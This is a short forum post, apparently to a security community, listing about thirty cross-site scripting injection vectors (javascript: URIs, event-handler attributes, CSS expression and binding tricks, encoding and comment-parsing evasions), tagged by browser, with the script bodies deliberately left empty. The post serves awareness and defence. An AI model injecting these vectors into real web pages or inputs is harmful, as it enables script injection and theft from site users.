Hi malware fighters,
Here is a list:
<a href="javascript#">
<div onmouseover=">
<img src="javascript:">
<img dynsrc="javascript:"> [IE]
<input type="image" dynsrc="javascript:"> [IE]
<bgsound src="javascript:"> [IE]
&<script></script>
&{}; [Fx
<img src=&{};> [Fx]
<link rel="stylesheet" href="javascript:">
<iframe src="vbscript:"> [IE]
<img src="mocha:"> [Fx]
<img src="livescript:"> [Fx
<a href="about:<script></script>">
<meta http-equiv="refresh" content="0;url=javascript:">
<body onload="">
<div style="background-image: url(javascript:);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression();"> [IE]
<style type="text/javascript"></style> [Fx]
<object classid="clsid:..." codebase="javascript:"> [IE]
<style><!--</style><script>//--></script>
<!-- -- --><script></script><!-- -- -->
<<script></script>
<img src="blah"onmouseover="">
<img src="blah>" onmouseover="">
<xml src="javascript:">
<xml id="X"><a><b><script></script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[\xC0][\xBC]/script> [UTF-8; IE, Opera]
<![CDATA[<!--]] ><script>//--></script>
For security reasons I took where the code should go out of the examples
some only apply to specific browsers , so have your NS extension active...
firekeeper blocks them all...
polonus
